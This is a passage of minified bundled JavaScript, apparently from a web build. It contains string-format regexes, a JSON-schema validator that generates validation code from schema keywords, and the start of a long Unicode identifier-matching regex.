                }), t.uri = /^[a-zA-Z][a-zA-Z0-9+\-.]*:[^\s]*$/, t.color = /(#?([0-9A-Fa-f]{3,6})\b)|(aqua)|(black)|(blue)|(fuchsia)|(gray)|(green)|(lime)|(maroon)|(navy)|(olive)|(orange)|(purple)|(red)|(silver)|(teal)|(white)|(yellow)|(rgb\(\s*\b([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\b\s*,\s*\b([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\b\s*,\s*\b([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\b\s*\))|(rgb\(\s*(\d?\d%|100%)+\s*,\s*(\d?\d%|100%)+\s*,\s*(\d?\d%|100%)+\s*\))/, t.hostname = function(e) {
                    if (!o.test(e)) return !1;
                    for(var t = e.split("."), r = 0; r < t.length; r++)if (!s.test(t[r])) return !1;
                    return !0;
                }, t.alpha = /^[a-zA-Z]+$/, t.alphanumeric = /^[a-zA-Z0-9]+$/, t.style = /.:\s*[^;]/g, t.phone = function(e) {
                    if (!a.test(e)) return !1;
                    if (u.test(e)) return !1;
                    var t = e.substring(1).replace(c, "").length;
                    return t >= 7 && t <= 15;
                }, t["utc-millisec"] = /^[0-9]{1,15}\.?[0-9]{0,15}$/;
            },
            772: (e, t, r)=>{
                var n = r(6e3), i = r(8616), o = r(404), s = r(1960), a = r(7465), u = {
                    any: function() {
                        return "true";
                    },
                    null: function(e) {
                        return e + " === null";
                    },
                    boolean: function(e) {
                        return "typeof " + e + ' === "boolean"';
                    },
                    array: function(e) {
                        return "Array.isArray(" + e + ")";
                    },
                    object: function(e) {
                        return "typeof " + e + ' === "object" && ' + e + " && !Array.isArray(" + e + ")";
                    },
                    number: function(e) {
                        return "typeof " + e + ' === "number" && isFinite(' + e + ")";
                    },
                    integer: function(e) {
                        return "typeof " + e + ' === "number" && (Math.floor(' + e + ") === " + e + " || " + e + " > 9007199254740992 || " + e + " < -9007199254740992)";
                    },
                    string: function(e) {
                        return "typeof " + e + ' === "string"';
                    }
                }, c = function(e, t) {
                    t = Math.min(-1 === t ? e.length : t, e.length);
                    for(var r = [], n = 0; n < t; n++)r.push("object" == typeof e[n] ? JSON.stringify(e[n]) : e[n]);
                    for(n = 1; n < r.length; n++)if (r.indexOf(r[n]) !== n) return !1;
                    return !0;
                }, l = function(e, t) {
                    var r = (0 | t) !== t ? Math.pow(10, t.toString().split(".").pop().length) : 1;
                    return !(r > 1 ? ((0 | e) !== e ? Math.pow(10, e.toString().split(".").pop().length) : 1) > r || Math.round(r * e) % (r * t) : e % t);
                }, d = function(e, t, r) {
                    return r > -1 && t.length > r || e.test(t);
                }, h = function(e, t, r, f, p) {
                    var m = p ? s(a, p.formats) : a, g = {
                        unique: c,
                        formats: m,
                        isMultipleOf: l,
                        testLimitedRegex: d
                    }, y = !!p && !!p.verbose, v = !(!p || void 0 === p.greedy) && p.greedy, b = {}, E = [], A = function(e) {
                        var t = e + (b[e] = (b[e] || 0) + 1);
                        return E.push(t), t;
                    }, _ = function(e) {
                        var t = JSON.stringify(e);
                        try {
                            for(var r = /\[([^\[\]"]+)\]/; r.test(t);)t = t.replace(r, n);
                            return t;
                        } catch (t) {
                            return JSON.stringify(e);
                        }
                        function n(e, t) {
                            if (-1 === E.indexOf(t)) throw new Error("Unreplaceable");
                            return '." + ' + t + ' + "';
                        }
                    }, w = {}, T = function(e) {
                        if (w[e]) return w[e];
                        var t = A("pattern");
                        return g[t] = new RegExp(e), w[e] = t, t;
                    }, R = [
                        "i",
                        "j",
                        "k",
                        "l",
                        "m",
                        "n",
                        "o",
                        "p",
                        "q",
                        "r",
                        "s",
                        "t",
                        "u",
                        "v",
                        "x",
                        "y",
                        "z"
                    ], I = function() {
                        var e = R.shift();
                        return R.push(e + e[0]), E.push(e), e;
                    }, S = function(e, i, s, c, l) {
                        var d = i.properties, f = i.type, b = !1;
                        Array.isArray(i.items) && (d = {}, i.items.forEach(function(e, t) {
                            d[t] = e;
                        }), f = "array", b = !0);
                        var E = 0, w = function(t, r, n) {
                            P("errors++"), !0 === s && (P("if (validate.errors === null) validate.errors = []"), y ? P("validate.errors.push({field:%s,message:%s,value:%s,type:%s,schemaPath:%s})", _(r || e), JSON.stringify(t), n || e, JSON.stringify(f), JSON.stringify(l)) : P("validate.errors.push({field:%s,message:%s})", _(r || e), JSON.stringify(t)));
                        };
                        !0 === i.required ? (E++, P("if (%s === undefined) {", e), w("is required"), P("} else {")) : (E++, P("if (%s !== undefined) {", e));
                        var R = [].concat(f).map(function(t) {
                            if (t && !u.hasOwnProperty(t)) throw new Error("Unknown type: " + t);
                            return u[t || "any"](e);
                        }).join(" || ") || "true";
                        if ("true" !== R && (E++, P("if (!(%s)) {", R), w("is the wrong type"), P("} else {")), b) {
                            if (!1 === i.additionalItems) P("if (%s.length > %d) {", e, i.items.length), w("has additional items"), P("}");
                            else if (i.additionalItems) {
                                var O = I();
                                P("for (var %s = %d; %s < %s.length; %s++) {", O, i.items.length, O, e, O), S(e + "[" + O + "]", i.additionalItems, s, c, l.concat("additionalItems")), P("}");
                            }
                        }
                        if (i.format && m[i.format]) {
                            "string" !== f && a[i.format] && P("if (%s) {", u.string(e));
                            var x = A("format");
                            g[x] = m[i.format], "function" == typeof g[x] ? P("if (!%s(%s)) {", x, e) : P("if (!testLimitedRegex(%s, %s, %d)) {", x, e, void 0 === i.maxLength ? -1 : i.maxLength), w("must be " + i.format + " format"), P("}"), "string" !== f && a[i.format] && P("}");
                        }
                        if (Array.isArray(i.required) && (x = A("missing"), P("var %s = 0", x), P("if ((%s)) {", "object" !== f ? u.object(e) : "true"), i.required.map(function(t) {
                            var r = n(e, t);
                            P("if (%s === undefined) {", r), w("is required", r), P("%s++", x), P("}");
                        }), P("}"), v || (P("if (%s === 0) {", x), E++)), i.uniqueItems && ("array" !== f && P("if (%s) {", u.array(e)), P("if (!(unique(%s, %d))) {", e, i.maxItems || -1), w("must be unique"), P("}"), "array" !== f && P("}")), i.enum) {
                            var M = i.enum.some(function(e) {
                                return "object" == typeof e;
                            }) ? function(t) {
                                return "JSON.stringify(" + e + ") !== JSON.stringify(" + JSON.stringify(t) + ")";
                            } : function(t) {
                                return e + " !== " + JSON.stringify(t);
                            };
                            P("if (%s) {", i.enum.map(M).join(" && ") || "false"), w("must be an enum value"), P("}");
                        }
                        if (i.dependencies && ("object" !== f && P("if (%s) {", u.object(e)), Object.keys(i.dependencies).forEach(function(t) {
                            var r = i.dependencies[t];
                            "string" == typeof r && (r = [
                                r
                            ]), Array.isArray(r) && (P("if (%s !== undefined && !(%s)) {", n(e, t), r.map(function(t) {
                                return n(e, t) + " !== undefined";
                            }).join(" && ") || "true"), w("dependencies not set"), P("}")), "object" == typeof r && (P("if (%s !== undefined) {", n(e, t)), S(e, r, s, c, l.concat([
                                "dependencies",
                                t
                            ])), P("}"));
                        }), "object" !== f && P("}")), i.additionalProperties || !1 === i.additionalProperties) {
                            "object" !== f && P("if (%s) {", u.object(e)), O = I();
                            var B = A("keys"), N = Object.keys(d || {}).map(function(e) {
                                return B + "[" + O + "] !== " + JSON.stringify(e);
                            }).concat(Object.keys(i.patternProperties || {}).map(function(e) {
                                return "!" + T(e) + ".test(" + B + "[" + O + "])";
                            })).join(" && ") || "true";
                            P("var %s = Object.keys(%s)", B, e)("for (var %s = 0; %s < %s.length; %s++) {", O, O, B, O)("if (%s) {", N), !1 === i.additionalProperties ? (c && P("delete %s", e + "[" + B + "[" + O + "]]"), w("has additional properties", null, JSON.stringify(e + ".") + " + " + B + "[" + O + "]")) : S(e + "[" + B + "[" + O + "]]", i.additionalProperties, s, c, l.concat([
                                "additionalProperties"
                            ])), P("}")("}"), "object" !== f && P("}");
                        }
                        if (i.$ref) {
                            var C = function(e, t, r) {
                                var n = function(e) {
                                    return e && e.id === r ? e : "object" == typeof e && e ? Object.keys(e).reduce(function(t, r) {
                                        return t || n(e[r]);
                                    }, null) : null;
                                }, i = n(e);
                                if (i) return i;
                                r = (r = r.replace(/^#/, "")).replace(/\/$/, "");
                                try {
                                    return o.get(e, decodeURI(r));
                                } catch (e) {
                                    var s, a = r.indexOf("#");
                                    if (0 !== a) {
                                        if (-1 === a) s = t[r];
                                        else {
                                            s = t[r.slice(0, a)];
                                            var u = r.slice(a).replace(/^#/, "");
                                            try {
                                                return o.get(s, u);
                                            } catch (e) {}
                                        }
                                    } else s = t[r];
                                    return s || null;
                                }
                            }(r, p && p.schemas || {}, i.$ref);
                            if (C) {
                                var k = t[i.$ref];
                                k || (t[i.$ref] = function(e) {
                                    return k(e);
                                }, k = h(C, t, r, !1, p)), x = A("ref"), g[x] = k, P("if (!(%s(%s))) {", x, e), w("referenced schema does not match"), P("}");
                            }
                        }
                        if (i.not) {
                            var L = A("prev");
                            P("var %s = errors", L), S(e, i.not, !1, c, l.concat("not")), P("if (%s === errors) {", L), w("negative schema matches"), P("} else {")("errors = %s", L)("}");
                        }
                        if (i.items && !b && ("array" !== f && P("if (%s) {", u.array(e)), O = I(), P("for (var %s = 0; %s < %s.length; %s++) {", O, O, e, O), S(e + "[" + O + "]", i.items, s, c, l.concat("items")), P("}"), "array" !== f && P("}")), i.patternProperties && ("object" !== f && P("if (%s) {", u.object(e)), B = A("keys"), O = I(), P("var %s = Object.keys(%s)", B, e)("for (var %s = 0; %s < %s.length; %s++) {", O, O, B, O), Object.keys(i.patternProperties).forEach(function(t) {
                            var r = T(t);
                            P("if (%s.test(%s)) {", r, B + "[" + O + "]"), S(e + "[" + B + "[" + O + "]]", i.patternProperties[t], s, c, l.concat([
                                "patternProperties",
                                t
                            ])), P("}");
                        }), P("}"), "object" !== f && P("}")), i.pattern) {
                            var F = T(i.pattern);
                            "string" !== f && P("if (%s) {", u.string(e)), P("if (!(testLimitedRegex(%s, %s, %d))) {", F, e, void 0 === i.maxLength ? -1 : i.maxLength), w("pattern mismatch"), P("}"), "string" !== f && P("}");
                        }
                        if (i.allOf && i.allOf.forEach(function(t, r) {
                            S(e, t, s, c, l.concat([
                                "allOf",
                                r
                            ]));
                        }), i.anyOf && i.anyOf.length && (L = A("prev"), i.anyOf.forEach(function(t, r) {
                            0 === r ? P("var %s = errors", L) : P("if (errors !== %s) {", L)("errors = %s", L), S(e, t, !1, !1, l);
                        }), i.anyOf.forEach(function(e, t) {
                            t && P("}");
                        }), P("if (%s !== errors) {", L), w("no schemas match"), P("}")), i.oneOf && i.oneOf.length) {
                            L = A("prev");
                            var D = A("passes");
                            P("var %s = errors", L)("var %s = 0", D), i.oneOf.forEach(function(t, r) {
                                S(e, t, !1, !1, l), P("if (%s === errors) {", L)("%s++", D)("} else {")("errors = %s", L)("}");
                            }), P("if (%s !== 1) {", D), w("no (or more than one) schemas match"), P("}");
                        }
                        for(void 0 !== i.multipleOf && ("number" !== f && "integer" !== f && P("if (%s) {", u.number(e)), P("if (!isMultipleOf(%s, %d)) {", e, i.multipleOf), w("has a remainder"), P("}"), "number" !== f && "integer" !== f && P("}")), void 0 !== i.maxProperties && ("object" !== f && P("if (%s) {", u.object(e)), P("if (Object.keys(%s).length > %d) {", e, i.maxProperties), w("has more properties than allowed"), P("}"), "object" !== f && P("}")), void 0 !== i.minProperties && ("object" !== f && P("if (%s) {", u.object(e)), P("if (Object.keys(%s).length < %d) {", e, i.minProperties), w("has less properties than allowed"), P("}"), "object" !== f && P("}")), void 0 !== i.maxItems && ("array" !== f && P("if (%s) {", u.array(e)), P("if (%s.length > %d) {", e, i.maxItems), w("has more items than allowed"), P("}"), "array" !== f && P("}")), void 0 !== i.minItems && ("array" !== f && P("if (%s) {", u.array(e)), P("if (%s.length < %d) {", e, i.minItems), w("has less items than allowed"), P("}"), "array" !== f && P("}")), void 0 !== i.maxLength && ("string" !== f && P("if (%s) {", u.string(e)), P("if (%s.length > %d) {", e, i.maxLength), w("has longer length than allowed"), P("}"), "string" !== f && P("}")), void 0 !== i.minLength && ("string" !== f && P("if (%s) {", u.string(e)), P("if (%s.length < %d) {", e, i.minLength), w("has less length than allowed"), P("}"), "string" !== f && P("}")), void 0 !== i.minimum && ("number" !== f && "integer" !== f && P("if (%s) {", u.number(e)), P("if (%s %s %d) {", e, i.exclusiveMinimum ? "<=" : "<", i.minimum), w("is less than minimum"), P("}"), "number" !== f && "integer" !== f && P("}")), void 0 !== i.maximum && ("number" !== f && "integer" !== f && P("if (%s) {", u.number(e)), P("if (%s %s %d) {", e, i.exclusiveMaximum ? ">=" : ">", i.maximum), w("is more than maximum"), P("}"), "number" !== f && "integer" !== f && P("}")), d && Object.keys(d).forEach(function(t) {
                            Array.isArray(f) && -1 !== f.indexOf("null") && P("if (%s !== null) {", e), S(n(e, t), d[t], s, c, l.concat(b ? t : [
                                "properties",
                                t
                            ])), Array.isArray(f) && -1 !== f.indexOf("null") && P("}");
                        }); E--;)P("}");
                    }, P = i("function validate(data) {")("if (data === undefined) data = null")("validate.errors = null")("var errors = 0");
                    return S("data", e, f, p && p.filter, []), P("return errors === 0")("}"), (P = P.toFunction(g)).errors = null, Object.defineProperty && Object.defineProperty(P, "error", {
                        get: function() {
                            return P.errors ? P.errors.map(function(e) {
                                return e.field + " " + e.message;
                            }).join("\n") : "";
                        }
                    }), P.toJSON = function() {
                        return e;
                    }, P;
                };
                e.exports = function(e, t) {
                    return "string" == typeof e && (e = JSON.parse(e)), h(e, {}, e, !0, t);
                }, e.exports.filter = function(t, r) {
                    var n = e.exports(t, s(r, {
                        filter: !0
                    }));
                    return function(e) {
                        return n(e), e;
                    };
                };
            },
            892: (e)=>{
                "use strict";
                e.exports = function(e) {
                    return /^[$A-Z\_a-z\xaa\xb5\xba\xc0-\xd6\xd8-\xf6\xf8-\u02c1\u02c6-\u02d1\u02e0-\u02e4\u02ec\u02ee\u0370-\u0374\u0376\u0377\u037a-\u037d\u0386\u0388-\u038a\u038c\u038e-\u03a1\u03a3-\u03f5\u03f7-\u0481\u048a-\u0527\u0531-\u0556\u0559\u0561-\u0587\u05d0-\u05ea\u05f0-\u05f2\u0620-\u064a\u066e\u066f\u0671-\u06d3\u06d5\u06e5\u06e6\u06ee\u06ef\u06fa-\u06fc\u06ff\u0710\u0712-\u072f\u074d-\u07a5\u07b1\u07ca-\u07ea\u07f4\u07f5\u07fa\u0800-\u0815\u081a\u0824\u0828\u0840-\u0858\u08a0\u08a2-\u08ac\u0904-\u0939\u093d\u0950\u0958-\u0961\u0971-\u0977\u0979-\u097f\u0985-\u098c\u098f\u0990\u0993-\u09a8\u09aa-\u09b0\u09b2\u09b6-\u09b9\u09bd\u09ce\u09dc\u09dd\u09df-\u09e1\u09f0\u09f1\u0a05-\u0a0a\u0a0f\u0a10\u0a13-\u0a28\u0a2a-\u0a30\u0a32\u0a33\u0a35\u0a36\u0a38\u0a39\u0a59-\u0a5c\u0a5e\u0a72-\u0a74\u0a85-\u0a8d\u0a8f-\u0a91\u0a93-\u0aa8\u0aaa-\u0ab0\u0ab2\u0ab3\u0ab5-\u0ab9\u0abd\u0ad0\u0ae0\u0ae1\u0b05-\u0b0c\u0b0f\u0b10\u0b13-\u0b28\u0b2a-\u0b30\u0b32\u0b33\u0b35-\u0b39\u0b3d\u0b5c\u0b5d\u0b5f-\u0b61\u0b71\u0b83\u0b85-\u0b8a\u0b8e-\u0b90\u0b92-\u0b95\u0b99\u0b9a\u0b9c\u0b9e\u0b9f\u0ba3\u0ba4\u0ba8-\u0baa\u0bae-\u0bb9\u0bd0\u0c05-\u0c0c\u0c0e-\u0c10\u0c12-\u0c28\u0c2a-\u0c33\u0c35-\u0c39\u0c3d\u0c58\u0c59\u0c60\u0c61\u0c85-\u0c8c\u0c8e-\u0c90\u0c92-\u0ca8\u0caa-\u0cb3\u0cb5-\u0cb9\u0cbd\u0cde\u0ce0\u0ce1\u0cf1\u0cf2\u0d05-\u0d0c\u0d0e-\u0d10\u0d12-\u0d3a\u0d3d\u0d4e\u0d60\u0d61\u0d7a-\u0d7f\u0d85-\u0d96\u0d9a-\u0db1\u0db3-\u0dbb\u0dbd\u0dc0-\u0dc6\u0e01-\u0e30\u0e32\u0e33\u0e40-\u0e46\u0e81\u0e82\u0e84\u0e87\u0e88\u0e8a\u0e8d\u0e94-\u0e97\u0e99-\u0e9f\u0ea1-\u0ea3\u0ea5\u0ea7\u0eaa\u0eab\u0ead-\u0eb0\u0eb2\u0eb3\u0ebd\u0ec0-\u0ec4\u0ec6\u0edc-\u0edf\u0f00\u0f40-\u0f47\u0f49-\u0f6c\u0f88-\u0f8c\u1000-\u102a\u103f\u1050-\u1055\u105a-\u105d\u1061\u1065\u1066\u106e-\u1070\u1075-\u1081\u108e\u10a0-\u10c5\u10c7\u10cd\u10d0-\u10fa\u10fc-\u1248\u124a-\u124d\u1250-\u1256\u1258\u125a-\u125d\u1260-\u1288\u128a-\u128d\u1290-\u12b0\u12b2-\u12b5\u12b8-\u12be\u12c0\u12c2-\u12c5\u12c8-\u12d6\u12d8-\u1310\u1312-\u1315\u1318-\u135a\u1380-\u138f\u13a0-\u13f4\u1401-\u166c\u166f-\u167f\u1681-\u169a\u16a0-\u16ea\u16ee-\u16f0\u1700-\u170c\u170e-\u1711\u1720-\u1731\u1740-\u1751\u1760-\u176c\u176e-\u1770\u1780-\u17b3\u17d7\u17dc\u1820-\u1877\u1880-\u18a8\u18aa\u18b0-\u18f5\u1900-\u191c\u1950-\u196d\u1970-\u1974\u1980-\u19ab\u19c1-\u19c7\u1a00-\u1a16\u1a20-\u1a54\u1aa7\u1b05-\u1b33\u1b45-\u1b4b\u1b83-\u1ba0\u1bae\u1baf\u1bba-\u1be5\u1c00-\u1c23\u1c4d-\u1c4f\u1c5a-\u1c7d\u1ce9-\u1cec\u1cee-\u1cf1\u1cf5\u1cf6\u1d00-\u1dbf\u1e00-\u1f15\u1f18-\u1f1d\u1f20-\u1f45\u1f48-\u1f4d\u1f50-\u1f57\u1f59\u1f5b\u1f5d\u1f5f-\u1f7d\u1f80-\u1fb4\u1fb6-\u1fbc\u1fbe\u1fc2-\u1fc4\u1fc6-\u1fcc\u1fd0-\u1fd3\u1fd6-\u1fdb\u1fe0-\u1fec\u1ff2-\u1ff4\u1ff6-\u1ffc\u2071\u207f\u2090-\u209c\u2102\u2107\u210a-\u2113\u2115\u2119-\u211d\u2124\u2126\u2128\u212a-\u212d\u212f-\u2139\u213c-\u213f\u2145-\u2149\u214e\u2160-\u2188\u2c00-\u2c2e\u2c30-\u2c5e\u2c60-\u2ce4\u2ceb-\u2cee\u2cf2\u2cf3\u2d00-\u2d25\u2d27\u2d2d\u2d30-\u2d67\u2d6f\u2d80-\u2d96\u2da0-\u2da6\u2da8-\u2dae\u2db0-\u2db6\u2db8-\u2dbe\u2dc0-\u2dc6\u2dc8-\u2dce\u2dd0-\u2dd6\u2dd8-\u2dde\u2e2f\u3005-\u3007\u3021-\u3029\u3031-\u3035\u3038-\u303c\u3041-\u3096\u309d-\u309f\u30a1-\u30fa\u30fc-\u30ff\u3105-\u312d\u3131-\u318e\u31a0-\u31ba\u31f0-\u31ff\u3400-\u4db5\u4e00-\u9fcc\ua000-\ua48c\ua4d0-\ua4fd\ua500-\ua60c\ua610-\ua61f\ua62a\ua62b\ua640-\ua66e\ua67f-\ua697\ua6a0-\ua6ef\ua717-\ua71f\ua722-\ua788\ua78b-\ua78e\ua790-\ua793\ua7a0-\ua7aa\ua7f8-\ua801\ua803-\ua805\ua807-\ua80a\ua80c-\ua822\ua840-\ua873\ua882-\ua8b3\ua8f2-\ua8f7\ua8fb\ua90a-\ua925\ua930-\ua946\ua960-\ua97c\ua984-\ua9b2\ua9cf\uaa00-\uaa28\uaa40-\uaa42\uaa44-\uaa4b\uaa60-\uaa76\uaa7a\uaa80-\uaaaf\uaab1\uaab5\uaab6\uaab9-\uaabd\uaac0\uaac2\uaadb-\uaadd\uaae0-\uaaea\uaaf2-\uaaf4\uab01-\uab06\uab09-\uab0e\uab11-\uab16\uab20-\uab26\uab28-\uab2e\uabc0-\uabe2\uac00-\ud7a3\ud7b0-\ud7c6\ud7cb-\ud7fb\uf900-\ufa6d\ufa70-\ufad9\ufb00-\ufb06\ufb13-\ufb17\ufb1d\ufb1f-\ufb28\ufb2a-\ufb36\ufb38-\ufb3c\ufb3e\ufb40\ufb41\ufb43\ufb44\ufb46-\ufbb1\ufbd3-\ufd3d\ufd50-\ufd8f\ufd92-\ufdc7\ufdf0-\ufdfb\ufe70-\ufe74\ufe76-\ufefc\uff21-\uff3a\uff41-\uff5a\uff66-\uffbe\uffc2-\uffc7\uffca-\uffcf\uffd2-\uffd7\uffda-\uffdc][$A-Z\_a-z\xaa\xb5\xba\xc0-\xd6\xd8-\xf6\xf8-\u02c1\u02c6-\u02d1\u02e0-\u02e4\u02ec\u02ee\u0370-\u0374\u0376\u0377\u037a-\u037d\u0386\u0388-\u038a\u038c\u038e-\u03a1\u03a3-\u03f5\u03f7-\u0481\u048a-\u0527\u0531-\u0556\u0559\u0561-\u0587\u05d0-\u05ea\u05f0-\u05f2\u0620-\u064a\u066e\u066f\u0671-\u06d3\u06d5\u06e5\u06e6\u06ee\u06ef\u06fa-\u06fc\u06ff\u0710\u0712-\u072f\u074d-\u07a5\u07b1\u07ca-\u07ea\u07f4\u07f5\u07fa\u0800-\u0815\u081a\u0824\u0828\u0840-\u0858\u08a0\u08a2-\u08ac\u0904-\u0939\u093d\u0950\u0958-\u0961\u0971-\u0977\u0979-\u097f\u0985-\u098c\u098f\u0990\u0993-\u09a8\u09aa-\u09b0\u09b2\u09b6-\u09b9\u09bd\u09ce\u09dc\u09dd\u09df-\u09e1\u09f0\u09f1\u0a05-\u0a0a\u0a0f\u0a10\u0a13-\u0a28\u0a2a-\u0a30\u0a32\u0a33\u0a35\u0a36\u0a38\u0a39\u0a59-\u0a5c\u0a5e\u0a72-\u0a74\u0a85-\u0a8d\u0a8f-\u0a91\u0a93-\u0aa8\u0aaa-\u0ab0\u0ab2\u0ab3\u0ab5-\u0ab9\u0abd\u0ad0\u0ae0\u0ae1\u0b05-\u0b0c\u0b0f\u0b10\u0b13-\u0b28\u0b2a-\u0b30\u0b32\u0b33\u0b35-\u0b39\u0b3d\u0b5c\u0b5d\u0b5f-\u0b61\u0b71\u0b83\u0b85-\u0b8a\u0b8e-\u0b90\u0b92-\u0b95\u0b99\u0b9a\u0b9c\u0b9e\u0b9f\u0ba3\u0ba4\u0ba8-\u0baa\u0bae-\u0bb9\u0bd0\u0c05-\u0c0c\u0c0e-\u0c10\u0c12-\u0c28\u0c2a-\u0c33\u0c35-\u0c39\u0c3d\u0c58\u0c59\u0c60\u0c61\u0c85-\u0c8c\u0c8e-\u0c90\u0c92-\u0ca8\u0caa-\u0cb3\u0cb5-\u0cb9\u0cbd\u0cde\u0ce0\u0ce1\u0cf1\u0cf2\u0d05-\u0d0c\u0d0e-\u0d10\u0d12-\u0d3a\u0d3d\u0d4e\u0d60\u0d61\u0d7a-\u0d7f\u0d85-\u0d96\u0d9a-\u0db1\u0db3-\u0dbb\u0dbd\u0dc0-\u0dc6\u0e01-\u0e30\u0e32\u0e33\u0e40-\u0e46\u0e81\u0e82\u0e84\u0e87\u0e88\u0e8a\u0e8d\u0e94-\u0e97\u0e99-\u0e9f\u0ea1-\u0ea3\u0ea5\u0ea7\u0eaa\u0eab\u0ead-\u0eb0\u0eb2\u0eb3\u0ebd\u0ec0-\u0ec4\u0ec6\u0edc-\u0edf\u0f00\u0f40-\u0f47\u0f49-\u0f6c\u0f88-\u0f8c\u1000-\u102a\u103f\u1050-\u1055\u105a-\u105d\u1061\u1065\u1066\u106e-\u1070\u1075-\u1081\u108e\u10a0-\u10c5\u10c7\u10cd\u10d0-\u10fa\u10fc-\u1248\u124a-\u124d\u1250-\u1256\u1258\u125a-\u125d\u1260-\u1288\u128a-\u128d\u1290-\u12b0\u12b2-\u12b5\u12b8-\u12be\u12c0\u12c2-\u12c5\u12c8-\u12d6\u12d8-\u1310\u1312-\u1315\u1318-\u135a\u1380-\u138f\u13a0-\u13f4\u1401-\u166c\u166f-\u167f\u1681-\u169a\u16a0-\u16ea\u16ee-\u16f0\u1700-\u170c\u170e-\u1711\u1720-\u1731\u1740-\u1751\u1760-\u176c\u176e-\u1770\u1780-\u17b3\u17d7\u17dc\u1820-\u1877\u1880-\u18a8\u18aa\u18b0-\u18f5\u1900-\u191c\u1950-\u196d\u1970-\u1974\u1980-\u19ab\u19c1-\u19c7\u1a00-\u1a16\u1a20-\u1a54\u1aa7\u1b05-\u1b33\u1b45-\u1b4b\u1b83-\u1ba0\u1bae\u1baf\u1bba-\u1be5\u1c00-\u1c23\u1c4d-\u1c4f\u1c5a-\u1c7d\u1ce9-\u1cec\u1cee-\u1cf1\u1cf5\u1cf6\u1d00-\u1dbf\u1e00-\u1f15\u1f18-\u1f1d\u1f20-\u1f45\u1f48-\u1f4d\u1f50-\u1f57\u1f59\u1f5b\u1f5d\u1f5f-\u1f7d\u1f80-\u1fb4\u1fb6-\u1fbc\u1fbe\u1fc2-\u1fc4\u1fc6-\u1fcc\u1fd0-\u1fd3\u1fd6-\u1fdb\u1fe0-\u1fec\u1ff2-\u1ff4\u1ff6-\u1ffc\u2071\u207f\u2090-\u209c\u2102\u2107\u210a-\u2113\u2115\u2119-\u211d\u2124\u2126\u2128\u212a-\u212d\u212f-\u2139\u213c-\u213f\u2145-\u2149\u214e\u2160-\u2188\u2c00-\u2c2e\u2c30-\u2c5e\u2c60-\u2ce4\u2ceb-\u2cee\u2cf2\u2cf3\u2d00-\u2d25\u2d27\u2d2d\u2d30-\u2d67\u2d6f\u2d80-\u2d96\u2da0-\u2da6\u2da8-\u2dae\u2db0-\u2db6\u2db8-\u2dbe\u2dc0-\u2dc6\u2dc8-\u2dce\u2dd0-\u2dd6\u2dd8-\u2dde\u2e2f\u3005-\u3007\u3021-\u3029\u3031-\u3035\u3038-\u303c\u3041-\u3096\u309d-\u309f\u30a1-\u30fa\u30fc-\u30ff\u3105-\u312d\u3131-\u318e\u31a0-\u31ba\u31f0-\u31ff\u3400-\u4db5\u4e00-\u9fcc\ua000-\ua48c\ua4d0-\ua4fd\ua500-\ua60c\ua610-\ua61f\ua62a\ua62b\ua640-\ua66e\ua67f-\ua697\ua6a0-\ua6ef\ua717-\ua71f\ua722-\ua788\ua78b-\ua78e\ua790-\ua793\ua7a0-\ua7aa\ua7f8-\ua801\ua803-\ua805\ua807-\ua80a\ua80c-\ua822\ua840-\ua873\ua882-\ua8b3\ua8f2-\ua8f7\ua8fb\ua90a-\ua925\ua930-\ua946\ua960-\ua97c\ua984-\ua9b2\ua9cf\uaa00-\uaa28\uaa40-\uaa42\uaa44-\uaa4b\uaa60-\uaa76\uaa7a\uaa80-\uaaaf\uaab1\uaab5\uaab6\uaab9-\uaabd\uaac0\uaac2\uaadb-\uaadd\uaae0-\uaaea\uaaf2-\uaaf4\uab01-\uab06\uab09-\uab0e\uab11-\uab16\uab20-\uab26\uab28-\uab2e\uabc0-\uabe2\uac00-\ud7a3\ud7b0-\ud7c6\ud7cb-\ud7fb\uf900-\ufa6d\ufa70-\ufad9\ufb00-\ufb06\ufb13-\ufb17\ufb1d\ufb1f-\ufb28\ufb2a-\ufb36\ufb38-\ufb3c\ufb3e\ufb40\ufb41\ufb43\ufb44\ufb46-\ufbb1\ufbd3-\ufd3d\ufd50-\ufd8f\ufd92-\ufdc7\ufdf0-\ufdfb\ufe70-\ufe74\ufe76-\ufefc\uff21-\uff3a\uff41-\uff5a\uff66-\uffbe\uffc2-\uffc7\uffca-\uffcf\uffd2-\uffd7\uffda-\uffdc0-9\u0300-\u036f\u0483-\u0487\u0591-\u05bd\u05bf\u05c1\u05c2\u05c4\u05c5\u05c7\u0610-\u061a\u064b-\u0669\u0670\u06d6-\u06dc\u06df-\u06e4\u06e7\u06e8\u06ea-\u06ed\u06f0-\u06f9\u0711\u0730-\u074a\u07a6-\u07b0\u07c0-\u07c9\u07eb-\u07f3\u0816-\u0819\u081b-\u0823\u0825-\u0827\u0829-\u082d\u0859-\u085b\u08e4-\u08fe\u0900-\u0903\u093a-\u093c\u093e-\u094f\u0951-\u0957\u0962\u0963\u0966-\u096f\u0981-\u0983\u09bc\u09be-\u09c4\u09c7\u09c8\u09cb-\u09cd\u09d7\u09e2\u09e3\u09e6-\u09ef\u0a01-\u0a03\u0a3c\u0a3e-\u0a42\u0a47\u0a48\u0a4b-\u0a4d\u0a51\u0a66-\u0a71\u0a75\u0a81-\u0a83\u0abc\u0abe-\u0ac5\u0ac7-\u0ac9\u0acb-\u0acd\u0ae2\u0ae3\u0ae6-\u0aef\u0b01-\u0b03\u0b3c\u0b3e-\u0b44\u0b47\u0b48\u0b4b-\u0b4d\u0b56\u0b57\u0b62\u0b63\u0b66-\u0b6f\u0b82\u0bbe-\u0bc2\u0bc6-\u0bc8\u0bca-\u0bcd\u0bd7\u0be6-\u0bef\u0c01-\u0c03\u0c3e-\u0c44\u0c46-\u0c48\u0c4a-\u0c4d\u0c55\u0c56\u0c62\u0c63\u0c66-\u0c6f\u0c82\u0c83\u0cbc\u0cbe-\u0cc4\u0cc6-\u0cc8\u0cca-\u0ccd\u0cd5\u0cd6\u0ce2\u0ce3\u0ce6-\u0cef\u0d02\u0d03\u0d3e-\u0d44\u0d46-\u0d48\u0d4a-\u0d4d\u0d57\u0d62\u0d63\u0d66-\u0d6f\u0d82\u0d83\u0dca\u0dcf-\u0dd4\u0dd6\u0dd8-\u0ddf\u0df2\u0df3\u0e31\u0e34-\u0e3a\u0e47-\u0e4e\u0e50-\u0e59\u0eb1\u0eb4-\u0eb9\u0ebb\u0ebc\u0ec8-\u0ecd\u0ed0-\u0ed9\u0f18\u